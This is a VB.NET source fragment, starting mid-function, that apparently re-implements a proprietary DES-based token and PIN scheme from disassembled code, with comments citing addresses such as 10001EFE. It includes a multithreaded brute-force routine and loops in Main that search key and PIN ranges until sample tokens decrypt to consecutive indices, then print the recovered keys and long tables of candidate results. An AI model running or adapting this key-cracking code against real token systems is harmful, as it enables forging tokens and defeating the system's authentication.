For J = 0 To ByteLength - 1 TempBuffer(Pointer) = (B >> (7 - J)) And 1 Pointer = Pointer + 1 Next Next

Else For I = 0 To UBound(SourceString) B = SourceString(I)

For J = 0 To ByteLength - 1 TempBuffer(Pointer) = B >> (7 - J)      Pointer = Pointer + 1 Next Next End If

End If End If

GenerateByteShiftArray = TempBuffer End Function

Public Sub XorArrays(ByRef Array1 As Byte, ByRef Array2 As Byte, ByVal OverwriteBoth As Boolean, Optional ByVal XorLength As Integer = 0) Dim I As Integer Dim B As Byte Dim ArrayLength As Integer

If XorLength = 0 Then XorLength = UBound(Array1)

If XorLength > UBound(Array2) Then XorLength = UBound(Array2) End If

For I = 0 To XorLength B = Array1(I) B = Array2(I) Xor B  Array1(I) = B

If OverwriteBoth Then Array2(I) = B Next End Sub

Public Function BitBytesToHex(ByVal SourceArray As Byte, ByVal RequestedLength As Integer) As Byte Dim I, J, K As Integer Dim B As Byte Dim TempBuffer(-1) As Byte

If SourceArray.Length > 1 Then ReDim TempBuffer(Int(UBound(SourceArray) / 8))

I = 0 K = 0

Do   B = 0

For J = 1 To 8 B = B << 1 B = B + (SourceArray(I) And 1) I = I + 1 Next

TempBuffer(K) = B   K = K + 1 Loop Until I >= UBound(SourceArray) End If

If UBound(TempBuffer) > RequestedLength Then ReDim Preserve TempBuffer(RequestedLength - 1)

BitBytesToHex = TempBuffer End Function

Public Function Hex2Char(ByVal SourceArray As Byte, ByVal ConversionLength As Integer) As String Dim I As Integer Dim FinalString As String = "" Dim S As String

If SourceArray.Length > 0 Then For I = 0 To UBound(SourceArray) S = UCase(Trim(Hex(SourceArray(I)))) If Len(S) = 1 Then S = "0" + S

FinalString = FinalString & S  Next End If

If ConversionLength > 0 Then FinalString = Mid(FinalString, 1, ConversionLength) End If

Hex2Char = FinalString End Function

Public Function Hex2CharBytes(ByVal SourceArray As Byte) As Byte Dim I As Integer Dim TempBuffer(-1) As Byte Dim S As String

If SourceArray.Length > 0 Then ReDim TempBuffer(SourceArray.Length * 2)

For I = 0 To UBound(SourceArray) S = UCase(Trim(Hex(SourceArray(I)))) If Len(S) = 1 Then S = "0" + S

TempBuffer((I * 2) + 0) = Asc(Mid(S, 1, 1)) TempBuffer((I * 2) + 1) = Asc(Mid(S, 2, 1)) Next

End If

Hex2CharBytes = TempBuffer End Function

Public Function Convert7to8ByteArray(ByVal SourceArray As Byte) As Byte Dim EDXEAX As Long = 0 Dim I As Integer Dim TempBuffer(-1) As Byte

If SourceArray.Length >= 6 Then ReDim TempBuffer(7)

For I = 0 To 6 EDXEAX = (EDXEAX << 8) Or SourceArray(I) Next

For I = 0 To 7 TempBuffer(7 - I) = ((EDXEAX And &H7F) << 1) And &HFE EDXEAX = EDXEAX >> 7 Next End If

Convert7to8ByteArray = TempBuffer End Function

Public Function ConverHexCharsIntoByteArray(ByVal SourceArray As Byte) As Byte Dim I As Integer Dim B As Byte

Dim TempBuffer(-1) As Byte

If SourceArray.Length >= &H2 Then ReDim TempBuffer(UBound(SourceArray) / 2) For I = 0 To UBound(TempBuffer) B = SourceArray(I * 2)

If B >= &H30 And B <= &H39 Then B = B - &H30 ElseIf B >= &H41 And B <= &H46 Then B = B - &H41 + &HA ElseIf B >= &H61 And B <= &H66 Then B = B - &H61 + &HA Else B = 0 End If

B = B << 4

TempBuffer(I) = B

B = SourceArray((I * 2) + 1)

If B >= &H30 And B <= &H39 Then B = B - &H30 ElseIf B >= &H41 And B <= &H46 Then B = B - &H41 + &HA ElseIf B >= &H61 And B <= &H66 Then B = B - &H61 + &HA Else B = 0 End If

TempBuffer(I) = TempBuffer(I) Or B  Next End If

ConverHexCharsIntoByteArray = TempBuffer End Function

Public Function ConvertHexStringToBytes(ByVal SourceString As String) As Byte Dim I As Integer Dim B As Byte

Dim TempBuffer(-1) As Byte

If Len(SourceString) >= &H2 Then ReDim TempBuffer(Len(SourceString) / 2 - 1)

For I = 0 To UBound(TempBuffer) TempBuffer(I) = Val("&H" & Mid(SourceString, (I * 2) + 1, 2)) ' SourceArray(I * 2) Next End If

ConvertHexStringToBytes = TempBuffer End Function

Public Function Bytes2Long(ByVal SourceArray As Byte) As Long Dim Result As Long Dim I As Integer

For I = 0 To UBound(SourceArray) Result = (Result << 8) + SourceArray(I) Next

Bytes2Long = Result End Function

Public Function TokenToInt(ByVal Token As String) As Integer Dim I As Integer = 0 Dim TempToken As Integer = 0

Token = Trim(UCase(Token.Replace("H", "B").Replace("P", "D"))) For I = 1 To Len(Token) TempToken = (TempToken << 4) Or Val("&H" & Mid(Token, I, 1)) Next

TokenToInt = TempToken End Function

Private Sub BruteForceSub Dim I, J As Integer Dim L As Long Dim S As String

Dim LocalKeyStart As Long Dim LocalKeyEnd As Long Dim ThreadNo As Long

SyncLock BruteForceKeyStart LocalKeyStart = BruteForceKeyStart(0) BruteForceKeyStart(0) = BruteForceKeyStart(0) + ThreadBruteForceLimit

ThreadNo = BruteForceKeyStart(1) BruteForceKeyStart(1) = BruteForceKeyStart(1) + 1 End SyncLock

Dim LocalToken1 As Integer = TokenToInt("HH997P") Dim LocalToken2 As Integer = TokenToInt("A4PCF4")

LocalKeyEnd = LocalKeyStart + ThreadBruteForceLimit - 1

S = Hex(ThreadNo) S = Mid("00", 1, 2 - Len(S)) & S

Console.WriteLine Console.WriteLine("Thread(" & S & "): Starting from: " & Hex(LocalKeyStart))

For L = LocalKeyStart To LocalKeyEnd I = DecryptToken(LocalToken1, L, 1, 2) If I < 1000 Then J = DecryptToken(LocalToken2, L, 1, 2) If J = I + 1 Then Console.WriteLine Console.WriteLine("Thread(" & S & ") Found Key " & Hex(L) & ", Index: " & Hex(I)) End If  Else If L Mod &H10000 = 0 Then Console.Write(S & " ") End If Next

SyncLock BruteForceKeyStart BruteForceKeyStart(1) = BruteForceKeyStart(1) - 1 End SyncLock

Threading.Thread.CurrentThread.Join(1) End Sub

Private Function GetHexCodeFromString(ByVal HexString As String) As Long Dim I As Integer Dim FinalCode As Long = 0 Dim B As Byte

If HexString = "" Then HexString = "00000000000000" If Len(HexString) > 14 Then HexString = "00000000000000" HexString = Mid("00000000000000", 1, 14 - Len(HexString)) & UCase(HexString)

FinalCode = 0

For I = 1 To Len(HexString) B = Asc(Mid(HexString, I, 1)) If (B >= &H30 And B <= &H39) Then B = B - &H30 ElseIf (B >= &H41 And B <= &H5A) Then B = B - &H41 + &HA Else B = 0 ' Bad Code! End If

FinalCode = (FinalCode << 4) Or B Next

GetHexCodeFromString = FinalCode End Function

'Private Function Test(ByVal A1 As Byte, ByVal A2 As Byte, ByVal A3 As Byte, ByVal Type As Integer) As Long Private Function Test(ByVal Type As Integer, ByVal Direction As Integer) As Long Dim PinCode As String = "" ' "0000" Dim I As Integer Dim B As Byte

Dim PinDes1 As Byte Dim PinDes2 As Byte Dim PinDes3 As Byte

If Type = 0 Then ' 432 -> 423  PinDes1 = EncryptPinDES(PinCode, Key4_Source, Direction) PinDes2 = EncryptPinDES(PinCode, Key2_Source, Direction) PinDes3 = EncryptPinDES(PinCode, Key3_Logic, Direction) ElseIf Type = 1 Then ' 421 -> 431  PinDes1 = EncryptPinDES(PinCode, Key4_Source, Direction) PinDes2 = EncryptPinDES(PinCode, Key3_Logic, Direction) PinDes3 = EncryptPinDES(PinCode, Key1_Enigma, Direction) ElseIf Type = 2 Then ' 132 => 123  PinDes1 = EncryptPinDES(PinCode, Key1_Enigma, Direction) PinDes2 = EncryptPinDES(PinCode, Key2_Source, Direction) PinDes3 = EncryptPinDES(PinCode, Key3_Logic, Direction) End If

Dim TokenHexCharCode(UBound(PinDes1)) As Byte

If Type = 0 Or Type = 1 Then ' 10001ECF: 'For I = 0 To Int(UBound(CodeScramblingFinal1) / 2) ' B = CodeScramblingFinal1((I * 2) + 1)

' If CodeScramblingFinal1(I * 2) = 1 Then ' TokenHexCharCode(I) = PinDes1(B) ' ElseIf CodeScramblingFinal1(I * 2) = 2 Then ' TokenHexCharCode(I) = PinDes2(B) ' End If  'Next For I = 0 To 7 Select Case CodeScramblingFinal1(I * 2) Case 1 TokenHexCharCode(I) = PinDes1(CodeScramblingFinal1((I * 2) + 1)) Case 2 TokenHexCharCode(I) = PinDes2(CodeScramblingFinal1((I * 2) + 1)) End Select Next

' 10001EFE: XorArrays(TokenHexCharCode, PinDes3, False)                          ' 10001D50 ElseIf Type = 2 Then For I = 0 To 7 TokenHexCharCode(I) = PinDes1(I) Xor PinDes2(I) Xor PinDes3(I) Next End If

Dim BadTokenCode As Long = 0 For I = 0 To 7 - 1 BadTokenCode = (BadTokenCode << 8) Or TokenHexCharCode(I) Next

Test = BadTokenCode End Function

Private Function Test(ByVal A1 As Byte, ByVal A2 As Byte, ByVal A3 As Byte, ByVal Direction As Integer, ByVal PinCode As String, ByVal EncType As Integer) As Long 'Dim PinCode As String = "" ' "0000" Dim I As Integer Dim B As Byte

Dim PinDes1 As Byte = EncryptPinDES(PinCode, A1, Direction) Dim PinDes2 As Byte = EncryptPinDES(PinCode, A2, Direction) Dim PinDes3 As Byte = EncryptPinDES(PinCode, A3, Direction)

Dim TokenHexCharCode(UBound(PinDes1)) As Byte

If EncType = 0 Then For I = 0 To 7 Select Case CodeScramblingFinal1(I * 2) Case 1 TokenHexCharCode(I) = PinDes1(CodeScramblingFinal1((I * 2) + 1)) Case 2 TokenHexCharCode(I) = PinDes2(CodeScramblingFinal1((I * 2) + 1)) End Select Next

' 10001EFE: XorArrays(TokenHexCharCode, PinDes3, False)                          ' 10001D50

ElseIf EncType = 1 Then For I = 0 To 7 Select Case CodeScramblingFinal1(I * 2) Case 1 TokenHexCharCode(I) = PinDes2(CodeScramblingFinal1((I * 2) + 1)) Case 2 TokenHexCharCode(I) = PinDes1(CodeScramblingFinal1((I * 2) + 1)) End Select Next

' 10001EFE: XorArrays(TokenHexCharCode, PinDes3, False)                          ' 10001D50

ElseIf EncType = 2 Then For I = 0 To 7 TokenHexCharCode(I) = PinDes1(I) Xor PinDes2(I) Xor PinDes3(I) Next End If

Dim BadTokenCode As Long = 0 For I = 0 To 7 - 1 BadTokenCode = (BadTokenCode << 8) Or TokenHexCharCode(I) Next

Test = BadTokenCode End Function

Private Function Test(ByVal A1 As Byte, ByVal A2 As Byte, ByVal A3 As Byte, ByVal Direction As Integer, ByVal PinCode As Byte, ByVal EncType As Integer) As Long 'Dim PinCode As String = "" ' "0000" Dim I As Integer Dim B As Byte

Dim PinDes1 As Byte = EncryptPinDES(PinCode, A1, Direction) Dim PinDes2 As Byte = EncryptPinDES(PinCode, A2, Direction) Dim PinDes3 As Byte = EncryptPinDES(PinCode, A3, Direction)

Dim TokenHexCharCode(UBound(PinDes1)) As Byte

If EncType = 0 Then For I = 0 To 7 Select Case CodeScramblingFinal1(I * 2) Case 1 TokenHexCharCode(I) = PinDes1(CodeScramblingFinal1((I * 2) + 1)) Case 2 TokenHexCharCode(I) = PinDes2(CodeScramblingFinal1((I * 2) + 1)) End Select Next

' 10001EFE: XorArrays(TokenHexCharCode, PinDes3, False)                          ' 10001D50

ElseIf EncType = 1 Then For I = 0 To 7 Select Case CodeScramblingFinal1(I * 2) Case 1 TokenHexCharCode(I) = PinDes2(CodeScramblingFinal1((I * 2) + 1)) Case 2 TokenHexCharCode(I) = PinDes1(CodeScramblingFinal1((I * 2) + 1)) End Select Next

' 10001EFE: XorArrays(TokenHexCharCode, PinDes3, False)                          ' 10001D50

ElseIf EncType = 2 Then For I = 0 To 7 TokenHexCharCode(I) = PinDes1(I) Xor PinDes2(I) Xor PinDes3(I) Next End If

Dim BadTokenCode As Long = 0 For I = 0 To 7 - 1 BadTokenCode = (BadTokenCode << 8) Or TokenHexCharCode(I) Next

Test = BadTokenCode End Function

Sub Main 'MsgBox(Hex(DecryptToken(&H1C5732, &H59460071B3B853, 1, 1))) 'End

Console.WriteLine(Hex(GenerateTokenFromKey(&H1A2B3C4D5E6F70, 0, 1, 1, False))) 'End

Dim K1 As Byte = {&H1A, &H2B, &H3C, &H4D, &H5E, &H6F, &H70, &HFF} Dim C As Byte = GetEncryptedCounter(0)

Dim F As Byte = EncryptDecryptToken(K1, C, 8, 0) 'Console.ReadLine 'End

Dim B As Byte = {&H1A, &H2B, &H3C, &H4D, &H5E, &H6F, &H70} Dim X As Byte = Convert7to8ByteArray(B)

''Server_Save_Arrays 'End

Dim Token1 As Integer = TokenToInt("61FPCA") Dim Token2 As Integer = TokenToInt("64F760") Dim L As Long Dim I As Integer

'MsgBox("I") 'End

'Brute forcing: For L = &H1E00000 To &H1E00020 'For L = &H1A2B3C4D5E6F60 To &H1A2B3C4D5E6F80 If DecryptToken(Token1, L, 1, 1) = 22 Then If DecryptToken(Token2, L, 1, 1) = 23 Then Console.WriteLine(Hex(L)) End If  End If  Next

Console.WriteLine("Completed")

'Console.WriteLine(Hex(Test(0))) 'Console.WriteLine(Hex(Test(1))) 'Console.WriteLine(Hex(Test(2))) 'Console.WriteLine

'Console.WriteLine(DecryptToken(Token, Test(0), 1, 1) & " ") 'Console.WriteLine(DecryptToken(Token, Test(1), 1, 1) & " ") 'Console.WriteLine(DecryptToken(Token, Test(2), 1, 1) & " ")

Dim Direction As Integer = 0 Dim Host As Integer = 1 Dim AlgoVer As Integer = 1 Dim PinCode As String = "" '"0000" Dim EncType As Integer = 0

'Dim Token As Integer = TokenToInt("26ACHA") 'Dim Token As Integer = TokenToInt("C26177") 'Dim Token As Integer = TokenToInt("H4F71H") ' 2A0520") Dim Token As Integer = TokenToInt("1C5723")

'MsgBox(DecryptToken(Token, Test(2, 0), 1, 1) & " ") 'End

Dim P1 As Byte = {5, &H5F, &HA4, &H0} ''PinCode = "" : EncType = 0 Console.Write(Hex(Test(Key4_Source.Clone, Key2_Source.Clone, Key3_Logic.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.WriteLine(Hex(DecryptToken(&H26ACBA, Test(Key4_Source.Clone, Key2_Source.Clone, Key3_Logic.Clone, Direction, P1, EncType), 1, 1)) & Chr(9)) Console.WriteLine(Hex(DecryptToken(&HC26177, Test(Key4_Source.Clone, Key2_Source.Clone, Key3_Logic.Clone, Direction, P1, EncType), 1, 1)) & Chr(9)) Console.WriteLine Console.WriteLine 'Console.ReadLine 'End

' Brute Force 2: Dim P As Byte = {0, 0, 0, 0} Dim I2 As Integer = 0 'For L = &HE824691 To &HHE8246F0 Console.WriteLine("Starting From: 182DAB42") For L = &H182DAB42 To &H182DAB50 P(0) = (L >> 24) And &HFF P(1) = (L >> 16) And &HFF P(2) = (L >> 8) And &HFF P(3) = (L >> 0) And &HFF

I = DecryptToken(&H26ACBA, Test(Key4_Source.Clone, Key2_Source.Clone, Key3_Logic.Clone, Direction, P, EncType), 1, 1) If I < 10 Then I2 = DecryptToken(&HC26177, Test(Key4_Source.Clone, Key2_Source.Clone, Key3_Logic.Clone, Direction, P, EncType), 1, 1) If I2 < 10 Then Console.WriteLine("I: " & Hex(I) & ", I2: " & Hex(I2) & ", L: " & Hex(L)) End If  End If  Next Console.WriteLine("Ended") 'Console.ReadLine 'End

Console.WriteLine(DecryptToken(Token, &H1A2B3C4D5E6F70, Host, AlgoVer) & Chr(9)) Console.WriteLine(Hex(Test(Key1_Enigma.Clone, Key1_Enigma.Clone, Key1_Enigma.Clone, Direction, PinCode, EncType))) Console.WriteLine Console.WriteLine

' Console.Write(Hex(Test(Key1_Enigma.Clone, Key1_Enigma.Clone, Key1_Enigma.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key1_Enigma.Clone, Key1_Enigma.Clone, Key2_Source.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key1_Enigma.Clone, Key1_Enigma.Clone, Key3_Logic.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key1_Enigma.Clone, Key1_Enigma.Clone, Key4_Source.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.WriteLine

Console.Write(Hex(Test(Key1_Enigma.Clone, Key2_Source.Clone, Key1_Enigma.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key1_Enigma.Clone, Key2_Source.Clone, Key2_Source.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key1_Enigma.Clone, Key2_Source.Clone, Key3_Logic.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key1_Enigma.Clone, Key2_Source.Clone, Key4_Source.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.WriteLine

Console.Write(Hex(Test(Key1_Enigma.Clone, Key3_Logic.Clone, Key1_Enigma.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key1_Enigma.Clone, Key3_Logic.Clone, Key2_Source.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key1_Enigma.Clone, Key3_Logic.Clone, Key3_Logic.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key1_Enigma.Clone, Key3_Logic.Clone, Key4_Source.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.WriteLine

Console.Write(Hex(Test(Key1_Enigma.Clone, Key4_Source.Clone, Key1_Enigma.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key1_Enigma.Clone, Key4_Source.Clone, Key2_Source.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key1_Enigma.Clone, Key4_Source.Clone, Key3_Logic.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key1_Enigma.Clone, Key4_Source.Clone, Key4_Source.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.WriteLine Console.WriteLine

Console.Write(Hex(Test(Key2_Source.Clone, Key1_Enigma.Clone, Key1_Enigma.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key2_Source.Clone, Key1_Enigma.Clone, Key2_Source.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key2_Source.Clone, Key1_Enigma.Clone, Key3_Logic.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key2_Source.Clone, Key1_Enigma.Clone, Key4_Source.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.WriteLine

Console.Write(Hex(Test(Key2_Source.Clone, Key2_Source.Clone, Key1_Enigma.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key2_Source.Clone, Key2_Source.Clone, Key2_Source.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key2_Source.Clone, Key2_Source.Clone, Key3_Logic.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key2_Source.Clone, Key2_Source.Clone, Key4_Source.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.WriteLine

Console.Write(Hex(Test(Key2_Source.Clone, Key3_Logic.Clone, Key1_Enigma.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key2_Source.Clone, Key3_Logic.Clone, Key2_Source.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key2_Source.Clone, Key3_Logic.Clone, Key3_Logic.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key2_Source.Clone, Key3_Logic.Clone, Key4_Source.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.WriteLine

Console.Write(Hex(Test(Key2_Source.Clone, Key4_Source.Clone, Key1_Enigma.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key2_Source.Clone, Key4_Source.Clone, Key2_Source.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key2_Source.Clone, Key4_Source.Clone, Key3_Logic.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key2_Source.Clone, Key4_Source.Clone, Key4_Source.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.WriteLine Console.WriteLine

Console.Write(Hex(Test(Key3_Logic.Clone, Key1_Enigma.Clone, Key1_Enigma.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key3_Logic.Clone, Key1_Enigma.Clone, Key2_Source.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key3_Logic.Clone, Key1_Enigma.Clone, Key3_Logic.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key3_Logic.Clone, Key1_Enigma.Clone, Key4_Source.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.WriteLine

Console.Write(Hex(Test(Key3_Logic.Clone, Key2_Source.Clone, Key1_Enigma.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key3_Logic.Clone, Key2_Source.Clone, Key2_Source.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key3_Logic.Clone, Key2_Source.Clone, Key3_Logic.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key3_Logic.Clone, Key2_Source.Clone, Key4_Source.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.WriteLine

Console.Write(Hex(Test(Key3_Logic.Clone, Key3_Logic.Clone, Key1_Enigma.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key3_Logic.Clone, Key3_Logic.Clone, Key2_Source.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key3_Logic.Clone, Key3_Logic.Clone, Key3_Logic.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key3_Logic.Clone, Key3_Logic.Clone, Key4_Source.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.WriteLine

Console.Write(Hex(Test(Key3_Logic.Clone, Key4_Source.Clone, Key1_Enigma.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key3_Logic.Clone, Key4_Source.Clone, Key2_Source.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key3_Logic.Clone, Key4_Source.Clone, Key3_Logic.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key3_Logic.Clone, Key4_Source.Clone, Key4_Source.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.WriteLine Console.WriteLine

Console.Write(Hex(Test(Key4_Source.Clone, Key1_Enigma.Clone, Key1_Enigma.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key4_Source.Clone, Key1_Enigma.Clone, Key2_Source.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key4_Source.Clone, Key1_Enigma.Clone, Key3_Logic.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key4_Source.Clone, Key1_Enigma.Clone, Key4_Source.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.WriteLine

Console.Write(Hex(Test(Key4_Source.Clone, Key2_Source.Clone, Key1_Enigma.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key4_Source.Clone, Key2_Source.Clone, Key2_Source.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key4_Source.Clone, Key2_Source.Clone, Key3_Logic.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key4_Source.Clone, Key2_Source.Clone, Key4_Source.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.WriteLine

Console.Write(Hex(Test(Key4_Source.Clone, Key3_Logic.Clone, Key1_Enigma.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key4_Source.Clone, Key3_Logic.Clone, Key2_Source.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key4_Source.Clone, Key3_Logic.Clone, Key3_Logic.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key4_Source.Clone, Key3_Logic.Clone, Key4_Source.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.WriteLine

Console.Write(Hex(Test(Key4_Source.Clone, Key4_Source.Clone, Key1_Enigma.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key4_Source.Clone, Key4_Source.Clone, Key2_Source.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key4_Source.Clone, Key4_Source.Clone, Key3_Logic.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.Write(Hex(Test(Key4_Source.Clone, Key4_Source.Clone, Key4_Source.Clone, Direction, PinCode, EncType)) & Chr(9)) Console.WriteLine Console.WriteLine

'

Console.WriteLine Console.WriteLine Console.Write(DecryptToken(Token, Test(Key1_Enigma.Clone, Key1_Enigma.Clone, Key1_Enigma.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key1_Enigma.Clone, Key1_Enigma.Clone, Key2_Source.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key1_Enigma.Clone, Key1_Enigma.Clone, Key3_Logic.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key1_Enigma.Clone, Key1_Enigma.Clone, Key4_Source.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.WriteLine

Console.Write(DecryptToken(Token, Test(Key1_Enigma.Clone, Key2_Source.Clone, Key1_Enigma.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key1_Enigma.Clone, Key2_Source.Clone, Key2_Source.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key1_Enigma.Clone, Key2_Source.Clone, Key3_Logic.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key1_Enigma.Clone, Key2_Source.Clone, Key4_Source.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.WriteLine

Console.Write(DecryptToken(Token, Test(Key1_Enigma.Clone, Key3_Logic.Clone, Key1_Enigma.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key1_Enigma.Clone, Key3_Logic.Clone, Key2_Source.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key1_Enigma.Clone, Key3_Logic.Clone, Key3_Logic.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key1_Enigma.Clone, Key3_Logic.Clone, Key4_Source.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.WriteLine

Console.Write(DecryptToken(Token, Test(Key1_Enigma.Clone, Key4_Source.Clone, Key1_Enigma.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key1_Enigma.Clone, Key4_Source.Clone, Key2_Source.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key1_Enigma.Clone, Key4_Source.Clone, Key3_Logic.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key1_Enigma.Clone, Key4_Source.Clone, Key4_Source.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.WriteLine Console.WriteLine

Console.Write(DecryptToken(Token, Test(Key2_Source.Clone, Key1_Enigma.Clone, Key1_Enigma.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key2_Source.Clone, Key1_Enigma.Clone, Key2_Source.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key2_Source.Clone, Key1_Enigma.Clone, Key3_Logic.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key2_Source.Clone, Key1_Enigma.Clone, Key4_Source.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.WriteLine

Console.Write(DecryptToken(Token, Test(Key2_Source.Clone, Key2_Source.Clone, Key1_Enigma.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key2_Source.Clone, Key2_Source.Clone, Key2_Source.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key2_Source.Clone, Key2_Source.Clone, Key3_Logic.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key2_Source.Clone, Key2_Source.Clone, Key4_Source.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.WriteLine

Console.Write(DecryptToken(Token, Test(Key2_Source.Clone, Key3_Logic.Clone, Key1_Enigma.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key2_Source.Clone, Key3_Logic.Clone, Key2_Source.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key2_Source.Clone, Key3_Logic.Clone, Key3_Logic.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key2_Source.Clone, Key3_Logic.Clone, Key4_Source.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.WriteLine

